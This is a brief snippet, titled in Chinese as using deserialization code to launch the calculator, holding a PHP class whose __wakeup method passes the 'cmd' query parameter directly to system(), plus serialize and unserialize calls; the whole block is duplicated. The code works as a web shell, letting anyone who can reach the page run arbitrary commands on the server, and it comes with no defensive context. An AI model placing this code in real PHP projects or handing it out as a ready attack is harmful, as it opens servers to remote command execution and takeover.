使用反序列化代码调取计算器
<?php
class TestClass {
public function __wakeup() {
system($_GET["cmd"]);
}
}
$serializedData = serialize(new TestClass());
$object = unserialize($serializedData);
?>
<?php
class TestClass {
public function __wakeup() {
system($_GET["cmd"]);
}
}
$serializedData = serialize(new TestClass());
$object = unserialize($serializedData);
?>